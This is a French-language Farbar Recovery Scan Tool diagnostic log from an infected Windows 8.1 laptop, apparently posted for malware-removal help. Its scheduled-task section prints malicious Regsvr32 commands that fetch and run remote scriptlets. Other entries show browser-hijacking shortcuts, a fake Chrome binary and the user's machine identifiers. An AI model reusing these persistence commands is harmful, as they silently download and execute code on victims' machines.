Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version: 22-04-2017 01 Exécuté par camille45 (22-04-2017 19:12:37) Exécuté depuis C:\Users\camille45\Downloads Windows 8.1 (Update) (X64) (2015-01-27 13:45:33) Mode d'amorçage: Normal ========================================================== ==================== Comptes: ============================= Administrateur (S-1-5-21-1848686201-2099664942-1849715749-500 - Administrator - Disabled) camille45 (S-1-5-21-1848686201-2099664942-1849715749-1001 - Administrator - Enabled) => C:\Users\camille45 HomeGroupUser$ (S-1-5-21-1848686201-2099664942-1849715749-1005 - Limited - Enabled) Invité (S-1-5-21-1848686201-2099664942-1849715749-501 - Limited - Disabled) ==================== Centre de sécurité ======================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.) AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF} AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402} ==================== Programmes installés ====================== (Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.) Aloha TriPeaks (x32 Version: 2.2.0.98 - WildTangent) Hidden AMD Catalyst Install Manager (HKLM\...\{8DE47BBC-F471-6960-2FAB-13D8983397C5}) (Version: 8.0.881.0 - Advanced Micro Devices, Inc.) AMD VISION Engine Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD) Avast Antivirus Gratuit (HKLM-x32\...\Avast Antivirus) (Version: 17.3.2291 - AVAST Software) Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden Bluetooth Stack for Windows by Toshiba (HKLM\...\{CEBB6BFB-D708-4F99-A633-BC2600E01EF6}) (Version: v9.10.32(T) - TOSHIBA CORPORATION) Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden Empress of the Deep - The Darkest Secret (x32 Version: 2.2.0.98 - WildTangent) Hidden Freemake Video Converter version 4.1.9 (HKLM-x32\...\Freemake Video Converter_is1) (Version: 4.1.9 - Ellora Assets Corporation) Galerie de photos (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.81 - Google Inc.) Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google) Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.33.3 - Google Inc.) Hidden HP Support Solutions Framework (HKLM-x32\...\{446AA6E0-104D-40FB-A18A-A3431AED2F14}) (Version: 12.6.14.19 - HP Inc.) Intel AppUp(SM) center (HKLM-x32\...\Intel AppUp(SM) center 33268) (Version: 3.6.1.33268.15 - Intel) Island Tribe (x32 Version: 2.2.0.98 - WildTangent) Hidden Jewel Quest Solitaire 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Magic Academy (x32 Version: 2.2.0.98 - WildTangent) Hidden Microsoft Office 365 - fr-fr (HKLM\...\O365HomePremRetail - fr-fr) (Version: 16.0.7870.2031 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Works 7.0 (HKLM-x32\...\{64D114CE-4234-45C2-B60A-2B07D5A48F72}) (Version: 07.02.0000 - Microsoft Corporation) Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Nero 12 Essentials Toshiba (HKLM-x32\...\{BA8958DC-ADD7-41E5-8436-5883C7E871C7}) (Version: 12.0.00400 - Nero AG) Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7870.2024 - Microsoft Corporation) Hidden Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7830.1018 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (Version: 16.0.7870.2024 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7668.2066 - Microsoft Corporation) Hidden OpenOffice 4.1.1 (HKLM-x32\...\{121727D5-FDF3-4723-BA57-EB383440ED72}) (Version: 4.11.9775 - Apache Software Foundation) Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden Premium Sound HD (HKLM\...\{94F03B8E-CB73-4653-AFE9-79112C01FED2}) (Version: 1.12.4600 - SRS Labs, Inc.) Prerequisite installer (x32 Version: 12.0.0002 - Nero AG) Hidden Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.3.730.2012 - Realtek) Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.8400.30136 - Realtek Semiconductor Corp.) Realtek WLAN Driver (HKLM-x32\...\{9D3D8C60-A55F-4fed-B2B9-173001290E16}) (Version: 2.00.0020 - REALTEK Semiconductor Corp.) SafeZone Stable 3.55.2393.596 (x32 Version: 3.55.2393.596 - Avast Software) Hidden Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee) Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.10.3 - Synaptics Incorporated) TOSHIBA Battery Check Utility (HKLM-x32\...\{5468E297-7EF8-4CB3-A091-F8714147793F}) (Version: 1.00.01.01 - Toshiba Corporation) TOSHIBA Desktop Assist (HKLM\...\{95CCACF0-010D-45F0-82BF-858643D8BC02}) (Version: 1.00.0007.00002 - Toshiba Corporation) TOSHIBA eco Utility (HKLM\...\{5944B9D4-3C2A-48DE-931E-26B31714A2F7}) (Version: 2.0.0.6414 - Toshiba Corporation) TOSHIBA Function Key (HKLM\...\{16562A90-71BC-41A0-B890-D91B0C267120}) (Version: 1.00.6425 - Toshiba Corporation) TOSHIBA Manuals (HKLM-x32\...\{90FF4432-21B7-4AF6-BA6E-FB8C1FED9173}) (Version: 10.10 - TOSHIBA) Toshiba Password Utility (HKLM-x32\...\InstallShield_{6D35FF17-A8B3-43D3-917E-5A1F2C3FB628}) (Version: 2.00.910 - Toshiba Corporation) TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.8.17.640104 - Toshiba Corporation) Toshiba Places Icon Utility (HKLM\...\{C991A8C4-307C-4FDD-8AAE-A1BF44881E95}) (Version: 2.1.1 - TOSHIBA) TOSHIBA Recovery Media Creator (HKLM-x32\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.2.0.54043005 - Toshiba Corporation) TOSHIBA Service Station (HKLM\...\{4E688A2F-C4FB-4606-9282-1045B79CBFE2}) (Version: 2.6.16.0 - Toshiba Corporation) TOSHIBA System Driver (HKLM-x32\...\{1E6A96A1-2BAB-43EF-8087-30437593C66C}) (Version: 1.00.0012 - Toshiba Corporation) TOSHIBA System Settings (HKLM-x32\...\{05A55927-DB9B-4E26-BA44-828EBFF829F0}) (Version: 1.00.0002.32002 - Toshiba Corporation) Toshiba TEMPRO (HKLM-x32\...\{F76F5214-83A8-4030-80C9-1EF57391D72A}) (Version: 4.9.2 - Toshiba Europe GmbH) TOSHIBA VIDEO PLAYER (HKLM\...\{FF07604E-C860-40E9-A230-E37FA41F103A}) (Version: 5.3.49.124 - Toshiba Corporation) Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.98 - WildTangent) Hidden Welcome App (Start-up experience) (x32 Version: 12.0.13000 - Nero AG) Hidden WildTangent Games (HKLM-x32\...\WildTangent toshiba Master Uninstall) (Version: 1.0.3.0 - WildTangent) WildTangent Games App (Toshiba Games) (x32 Version: 4.0.5.37 - WildTangent) Hidden Windows Live (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation) ==================== Personnalisé CLSID (Avec liste blanche): ========================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) HKU\S-1-5-21-1848686201-2099664942-1849715749-1001\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== ATTENTION CustomCLSID: HKU\S-1-5-21-1848686201-2099664942-1849715749-1001_Classes\CLSID\{00000001-0E3A-4123-8B32-4B68A91E104A}\InprocServer32 -> C:\Program Files\TOSHIBA\TOSHIBA Places Icon Utility\TosDIBasePlace.dll (Toshiba Corporation) CustomCLSID: HKU\S-1-5-21-1848686201-2099664942-1849715749-1001_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\camille45\AppData\Local\Microsoft\OneDrive\17.3.6799.0327\amd64\FileSyncShell64.dll => Pas (l'élément de données a 10 caractères en plus). CustomCLSID: HKU\S-1-5-21-1848686201-2099664942-1849715749-1001_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\camille45\AppData\Local\Microsoft\OneDrive\17.3.6799.0327\amd64\FileSyncShell64.dll => Pas (l'élément de données a 10 caractères en plus). CustomCLSID: HKU\S-1-5-21-1848686201-2099664942-1849715749-1001_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\camille45\AppData\Local\Microsoft\OneDrive\17.3.6799.0327\amd64\FileSyncShell64.dll => Pas (l'élément de données a 10 caractères en plus). ==================== Tâches planifiées (Avec liste blanche) ============= (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) Task: {187C30DB-EF4E-4A92-91DF-D483939241FD} - System32\Tasks\Toshiba\CommonNotifier => C:\Program Files (x86)\Toshiba TEMPRO\Toshiba.Tempro.UI.CommonNotifier.exe [2015-12-01] (Toshiba Europe GmbH) Task: {372AC715-17CB-40EF-9E15-5218F5E12E84} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.) Task: {43A7BD1C-252F-4A6D-909F-7CBA16CFC9DE} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj83NkM1RkI5RUY1NUF1FkJSFjM5NkYcOTzXOWMcFkF5MF== scrobj.dll Task: {46DE9666-BA15-4ADC-9034-0BEADAF63DBC} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj83NkM1RkI5RUY1NUF1FkJSFjM5NkYcOTzXOWMcFkF5MF== scrobj.dll Task: {4ECD2A6A-6150-4E81-BE60-3F9BE225B2EC} - System32\Tasks\SafeZone scheduled Autoupdate 1492708940 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2017-03-22] (Avast Software) Task: {4F67EE6D-F2BA-45FB-9EA8-CFE233CD30DE} - System32\Tasks\Synaptics TouchPad Enhancements => \Program Files\Synaptics\SynTP\SynTPEnh.exe Task: {75F51050-6C48-4A05-8ACB-E8D8B6C508DB} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2017-03-26] (Microsoft Corporation) Task: {86CC12D1-0A97-43D7-8DBC-91DA8C2353FF} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-04-20] (AVAST Software) Task: {B332E8E0-3635-452B-BF6F-7814224D882E} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2017-04-20] (AVAST Software) Task: {C698991F-4598-4D1B-BE8F-82E353A7402E} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-26] (Microsoft Corporation) Task: {D6EAAF67-6AD2-4DDF-B24C-9C8E30307840} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-26] (Microsoft Corporation) Task: {E1961AC5-DFBA-406F-BC5D-39B42E4FCE22} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.) Task: {E6D98FDF-FD08-44FC-8133-FCFC44910293} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-12-21] (HP Inc.) Task: {ED9AA0D1-0719-4D81-94D0-0E5EFC20BFAF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.) Task: {F95E90E4-56CC-4E51-958D-9E8F7DE90BFA} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe <==== ATTENTION (Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.) Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe ==================== Raccourcis ============================= (Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.) ShortcutWithArgument: C:\Users\camille45\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492604467&z=f5a35c05c8a93a32f5a6840g2zbt3o7q4edzazdq7c&from=che0812&uid=HitachiXHTS543232A7A384_120904E2M312BL1B1ZJPX ShortcutWithArgument: C:\Users\camille45\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492604467&z=f5a35c05c8a93a32f5a6840g2zbt3o7q4edzazdq7c&from=che0812&uid=HitachiXHTS543232A7A384_120904E2M312BL1B1ZJPX ShortcutWithArgument: C:\Users\camille45\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492604467&z=f5a35c05c8a93a32f5a6840g2zbt3o7q4edzazdq7c&from=che0812&uid=HitachiXHTS543232A7A384_120904E2M312BL1B1ZJPX ShortcutWithArgument: C:\Users\camille45\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\2235cc83f64c131d\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) -> --profile-directory=Default ==================== Modules chargés (Avec liste blanche) ============== 2011-10-13 23:38 - 2011-10-13 23:38 - 00156672 _____ () C:\Program Files (x86)\TOSHIBA\Password Utility\GFNEXSrv.exe 2014-07-04 22:33 - 2014-07-04 22:33 - 00127488 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Container.Wlan.dll 2012-07-19 03:38 - 2012-07-19 03:38 - 00020904 _____ () C:\Program Files\TOSHIBA\Hotkey\SmoothView.dll 2012-07-19 03:38 - 2012-07-19 03:38 - 00049064 _____ () C:\Program Files\TOSHIBA\Hotkey\Hotkey\FnZ.dll 2012-08-14 04:13 - 2012-08-14 04:13 - 00018344 _____ () C:\Program Files\TOSHIBA\Teco\TecoMUI.dll 2012-07-31 09:11 - 2012-07-31 09:11 - 00024576 _____ () C:\Program Files\TOSHIBA\TOSHIBA Places Icon Utility\fr\TosDILangPack.resources.dll 2017-03-06 17:39 - 2017-02-17 12:46 - 00073216 _____ () C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe 2017-04-20 14:40 - 2017-04-19 07:03 - 03767640 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.81\libglesv2.dll 2017-04-20 14:40 - 2017-04-19 07:03 - 00100696 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.81\libegl.dll 2017-04-17 16:17 - 2017-04-17 05:03 - 00106496 _____ () c:\programdata\software\apple\apps\notification.dll 2017-04-20 18:58 - 2017-04-20 18:58 - 00170216 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll 2017-04-20 18:59 - 2017-04-20 18:59 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll 2017-04-20 18:58 - 2017-04-20 18:58 - 00176480 _____ () C:\Program Files\AVAST Software\Avast\event_routing_rpc.dll 2017-04-20 18:57 - 2017-04-20 18:57 - 00293936 _____ () C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll 2017-04-20 18:58 - 2017-04-20 18:58 - 00653520 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll ==================== Alternate Data Streams (Avec liste blanche) ========= (Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.) ==================== Mode sans échec (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" ==================== Association (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.) ==================== Internet Explorer sites de confiance/sensibles =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.) IE trusted site: HKU\S-1-5-21-1848686201-2099664942-1849715749-1001\...\ma-config.com -> hxxp://ma-config.com IE trusted site: HKU\S-1-5-21-1848686201-2099664942-1849715749-1001\...\ma-config.com -> hxxps://ma-config.com IE trusted site: HKU\S-1-5-21-1848686201-2099664942-1849715749-1001\...\touslesdrivers.com -> hxxp://touslesdrivers.com ==================== Hosts contenu: =============================== (Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.) 2013-08-22 15:25 - 2013-08-22 15:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts ==================== Autres zones ============================ (Actuellement, il n'y a pas de correction automatique pour cette section.) HKU\S-1-5-21-1848686201-2099664942-1849715749-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\camille45\_CAA8353.jpg DNS Servers: 192.168.1.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Le Pare-feu est activé. ==================== MSCONFIG/TASK MANAGER éléments désactivés == ==================== RèglesPare-feu (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [{847F5306-DA9C-4308-A147-A0393FCFC069}] => (Allow) C:\Program Files\ma-config.com\MaConfigAgent.exe FirewallRules: [{93AFA65E-5542-48E1-AE53-42FECD5586FD}] => (Allow) C:\Program Files\ma-config.com\MaConfigAgent.exe FirewallRules: [{88BA779E-C4FE-482C-B325-78EABC187C9E}] => (Allow) LPort=48114 FirewallRules: [{D5AD0F81-7222-48C2-8152-F54BE43D5AFA}] => (Allow) LPort=48113 FirewallRules: [{123F1BA0-4907-46D8-98F8-29BE9933C813}] => (Allow) C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe FirewallRules: [{5E146123-DDDA-4A46-A650-85C35491D71A}] => (Allow) C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe FirewallRules: [{90CD74B2-EF8C-461B-9BCF-25BDDE37B6D1}] => (Allow) C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe FirewallRules: [{E70FFEBA-0E2A-4CB8-AAD8-C6C0F31C1D8A}] => (Allow) C:\Program Files (x86)\Nero\KM\KwikMedia.exe FirewallRules: [{7A29685D-4398-431A-829D-BD46283375DA}] => (Allow) C:\Program Files (x86)\Nero\KM\KwikMedia.exe FirewallRules: [{70237864-F5CC-434F-B205-5286D9B2A732}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe FirewallRules: [{BCF2C7CE-F805-42CA-AA7F-DC8607CF5E34}] => (Allow) LPort=2869 FirewallRules: [{1CE6BE78-A540-479D-BB30-21E0A96FADE0}] => (Allow) LPort=1900 FirewallRules: [{36AB26DF-B8E3-43F1-BAE8-67B40F17FBEE}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe FirewallRules: [{2986FC96-94B2-45E0-8955-4D391EEECF02}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe FirewallRules: [{DA3FC6B5-DB02-4338-8DE3-AF73C5EE7949}] => (Allow) C:\Users\camille45\AppData\Local\Temp\7zS56D3\HPDiagnosticCoreUI.exe FirewallRules: [{3AE77210-937B-4999-A66C-202CDD89E4E3}] => (Allow) C:\Users\camille45\AppData\Local\Temp\7zS56D3\HPDiagnosticCoreUI.exe FirewallRules: [{4E1347E1-2DCC-4175-85F0-B4868EA8E7C8}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe FirewallRules: [{15AD7431-63D5-45D6-A88E-75D124B1EEF0}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{D36E6BBA-5C6D-4519-A030-5BF17BB5EFBA}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe FirewallRules: [{D0F855FF-10EF-470B-B788-B21898198293}] => (Allow) C:\Program Files (x86)\MIO\loader\hitachixhts543232a7a384_120904e2m312bl1b1zjpx.dat FirewallRules: [{0CCF7FF0-C2F6-443B-8B4F-8F1D4CCDA8A9}] => (Allow) C:\Program Files (x86)\MIO\loader\hitachixhts543232a7a384_120904e2m312bl1b1zjpx.dat FirewallRules: [{ED58E96D-E5AF-4A38-801B-529EE300671A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{A17D4482-D161-4416-A1CD-3FCCA1521B3B}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.596\SZBrowser.exe ==================== Points de restauration ========================= 13-04-2017 00:43:00 Windows Update 18-04-2017 10:54:28 Removed Skype™ 7.33 20-04-2017 13:55:09 Programme d’installation pour les modules Windows 20-04-2017 20:25:32 Opération de restauration 22-04-2017 00:28:50 Avast Cleanup ==================== Éléments en erreur du Gestionnaire de périphériques ============= ==================== Erreurs du Journal des événements: ========================= Erreurs Application: ================== Error: (04/22/2017 06:07:02 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Le programme LiveComm.exe version 17.5.9600.20911 a cessé d’interagir avec Windows et a été fermé. Pour déterminer si des informations supplémentaires sont disponibles, consultez l’historique du problème dans le Centre de maintenance. ID de processus : 69c Heure de début : 01d2bb1d2c2b985f Heure de fin : 4294967295 Chemin d’accès de l’application : C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe ID de rapport : 2087f844-2711-11e7-8114-4c72b9d74e6b Nom complet du package défaillant : microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe ID de l’application relative au package défaillant : ppleae38af2e007f4358a809ac99a64a67c1 Error: (04/22/2017 01:01:20 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nom de l’application défaillante FreemakeUtilsService.exe, version : 1.0.0.0, horodatage : 0x58a6b7e9 Nom du module défaillant : KERNELBASE.dll, version : 6.3.9600.18340, horodatage : 0x5736541b Code d’exception : 0xe0434352 Décalage d’erreur : 0x00014878 ID du processus défaillant : 0x6c8 Heure de début de l’application défaillante : 0x01d2baf31525f6f2 Chemin d’accès de l’application défaillante : C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe Chemin d’accès du module défaillant: C:\WINDOWS\SYSTEM32\KERNELBASE.dll ID de rapport : 6e3428b3-26e6-11e7-8113-4c72b9d74e6b Nom complet du package défaillant : ID de l’application relative au package défaillant : Error: (04/22/2017 01:01:10 AM) (Source: .NET Runtime) (EventID: 1026) (User: ) Description: Application : FreemakeUtilsService.exe Version du Framework : v4.0.30319 Description : le processus a été arrêté en raison d'une exception non gérée. Informations sur l'exception : System.IO.FileNotFoundException Pile : à FreemakeUtilsService.Statistics.Manager.ApplyNewTargetsConfigs() à FreemakeUtilsService.Statistics.Manager.TargetsConfigSyncCompleted(System.Object, System.EventArgs) à FreemakeUtilsService.Common.Synchronizer.OnWorkerCompleted(System.Object, System.ComponentModel.RunWorkerCompletedEventArgs) à System.ComponentModel.BackgroundWorker.OnRunWorkerCompleted(System.ComponentModel.RunWorkerCompletedEventArgs) à System.ComponentModel.BackgroundWorker.AsyncOperationCompleted(System.Object) à System.Threading.QueueUserWorkItemCallback.WaitCallback_Context(System.Object) à System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) à System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) à System.Threading.QueueUserWorkItemCallback.System.Threading.IThreadPoolWorkItem.ExecuteWorkItem() à System.Threading.ThreadPoolWorkQueue.Dispatch() à System.Threading._ThreadPoolWaitCallback.PerformWaitCallback() Error: (04/22/2017 12:29:21 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: Les services de chiffrement ont échoué lors du traitement de l’appel OnIdentity() dans l’objet System Writer. Details: AddWin32ServiceFiles: Unable to back up image of service Update Service(FirefoxU) since QueryServiceConfig API failed System Error: Le fichier spécifié est introuvable. . Error: (04/21/2017 05:01:43 PM) (Source: Microsoft-Windows-WMI) (EventID: 4) (User: AUTORITE NT) Description: Erreur 0x8004401e rencontrée lors de la tentative de chargement du MOF C:\WINDOWS\SYSTEM32\WBEM\EN-US\PROFILEASSOCIATIONPROVIDER.MFL pendant la récupération d’un fichier .MOF désigné pour une récupération automatique. Error: (04/21/2017 05:01:43 PM) (Source: Microsoft-Windows-WMI) (EventID: 4) (User: AUTORITE NT) Description: Erreur 0x8004401e rencontrée lors de la tentative de chargement du MOF C:\WINDOWS\SYSTEM32\WBEM\EN-US\POWERMETERPROVIDER.MFL pendant la récupération d’un fichier .MOF désigné pour une récupération automatique. Error: (04/21/2017 05:01:43 PM) (Source: Microsoft-Windows-WMI) (EventID: 4) (User: AUTORITE NT) Description: Erreur 0x8004401e rencontrée lors de la tentative de chargement du MOF C:\WINDOWS\SYSTEM32\WBEM\EN-US\CIMDMTF.MFL pendant la récupération d’un fichier .MOF désigné pour une récupération automatique. Error: (04/21/2017 